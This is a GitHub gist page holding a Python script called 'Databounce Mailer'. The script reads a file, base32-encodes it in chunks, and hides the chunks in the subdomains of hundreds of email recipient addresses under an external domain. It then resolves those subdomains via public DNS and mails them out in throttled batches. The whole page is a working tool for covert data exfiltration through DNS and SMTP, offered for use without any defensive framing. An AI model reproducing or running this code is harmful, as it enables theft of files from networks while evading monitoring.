Skip to content

Instantly share code, notes, and snippets.

@yosignals
Created November 14, 2024 14:27
Show Gist options
  • Save yosignals/dce98eea85f8032afa0106e6ad6ad95e to your computer and use it in GitHub Desktop.
Save yosignals/dce98eea85f8032afa0106e6ad6ad95e to your computer and use it in GitHub Desktop.
Databounce Mailer - 500 'recipients per email'
import base64
import smtplib
import time
import argparse
import dns.resolver
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
# Configuration
CHUNK_SIZE = 63 # Size of each data chunk in bytes
RECIPIENTS_PER_EMAIL = 500
FREQUENCY_DELAY = 10 # Default delay in seconds between sending batches
SMTP_PORT = 587 # Change to 465 if using SSL
SMTP_USER = '[email protected]'
SMTP_PASSWORD = 'your_password'
USE_SSL = False # Set to True if your server uses SSL on port 465
def encode_file_in_base32_chunks(filepath):
with open(filepath, 'rb') as file:
data = file.read()
chunks = [data[i:i+CHUNK_SIZE] for i in range(0, len(data), CHUNK_SIZE)]
# Base32 encode each chunk, remove padding, and limit to 40 characters
encoded_chunks = [base64.b32encode(chunk).decode('utf-8').rstrip('=')[:40] for chunk in chunks]
return encoded_chunks
def format_email_address(chunk_number, total_chunks, encoded_chunk, external_domain):
# Construct the subdomain, limit each section to keep within 63-character label limit
full_subdomain = f"{chunk_number}of{total_chunks}.{encoded_chunk}.{external_domain}"
# Check if each DNS label is <= 63 characters and full domain <= 253 characters
labels = full_subdomain.split('.')
if any(len(label) > 63 for label in labels) or len(full_subdomain) > 253:
raise ValueError(f"DNS label or domain too long: {full_subdomain}")
return f"boop@{full_subdomain}"
def prepare_recipients(encoded_chunks, external_domain):
total_chunks = len(encoded_chunks)
recipients = [
format_email_address(i+1, total_chunks, encoded_chunk, external_domain)
for i, encoded_chunk in enumerate(encoded_chunks)
]
return recipients
def resolve_full_subdomain(full_subdomain):
"""
Attempts to resolve a full subdomain (multi-level) and returns True if successful.
"""
try:
resolver = dns.resolver.Resolver(configure=False)
resolver.cache = None # Disable caching to ensure fresh resolution
resolver.nameservers = ['8.8.8.8', '8.8.4.4'] # Use Google's public DNS servers
# Perform an A record lookup for the full subdomain
resolver.resolve(full_subdomain, 'A')
print(f"Subdomain {full_subdomain} resolved successfully.")
return True
except dns.resolver.NXDOMAIN:
print(f"Subdomain {full_subdomain} does not exist.")
return False
except dns.resolver.NoAnswer:
print(f"No answer for subdomain {full_subdomain}.")
return False
except Exception as e:
print(f"Failed to resolve {full_subdomain}: {e}")
return False
def send_emails_in_batches(recipients, smtp_server, aggressive, delay):
total_recipients = len(recipients)
total_batches = (total_recipients + RECIPIENTS_PER_EMAIL - 1) // RECIPIENTS_PER_EMAIL # Ceiling division
smtp_class = smtplib.SMTP_SSL if USE_SSL else smtplib.SMTP
with smtp_class(smtp_server, SMTP_PORT) as server:
if not USE_SSL and SMTP_PORT == 587:
server.starttls() # Use TLS only if not SSL and port 587
# If authentication is not required, comment out the login line
# server.login(SMTP_USER, SMTP_PASSWORD)
for batch_num in range(total_batches):
batch_recipients = []
for recipient in recipients[batch_num * RECIPIENTS_PER_EMAIL : (batch_num + 1) * RECIPIENTS_PER_EMAIL]:
full_subdomain = recipient.split('@')[1]
if resolve_full_subdomain(full_subdomain): # Only add if the full subdomain resolves
batch_recipients.append(recipient)
if batch_recipients:
msg = MIMEMultipart()
msg['From'] = SMTP_USER
msg['Subject'] = "Data Transmission"
for recipient in batch_recipients:
msg['To'] = recipient
msg.attach(MIMEText("Placeholder text - actual data attached in email address"))
server.sendmail(SMTP_USER, batch_recipients, msg.as_string())
print(f"Batch {batch_num + 1}/{total_batches} sent to {len(batch_recipients)} recipients.")
if not aggressive:
time.sleep(delay) # Delay between batches
def send_encoded_file(filepath, external_domain, aggressive=False, delay=FREQUENCY_DELAY):
smtp_server = f"smtp.{external_domain.split('.', 1)[1]}" # Use the domain part after the first subdomain
encoded_chunks = encode_file_in_base32_chunks(filepath)
recipients = prepare_recipients(encoded_chunks, external_domain)
print(f"Prepared {len(recipients)} recipient addresses.")
send_emails_in_batches(recipients, smtp_server, aggressive=aggressive, delay=delay)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Send a file as encoded data chunks via email.")
parser.add_argument('filepath', type=str, help="Path to the file to be sent.")
parser.add_argument('external_domain', type=str, help="External domain to use in the recipient email addresses.")
parser.add_argument('--aggressive', action='store_true', help="Send emails without delay between batches.")
parser.add_argument('--delay', type=int, default=FREQUENCY_DELAY, help="Delay in seconds between email batches.")
args = parser.parse_args()
send_encoded_file(args.filepath, args.external_domain, aggressive=args.aggressive, delay=args.delay)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment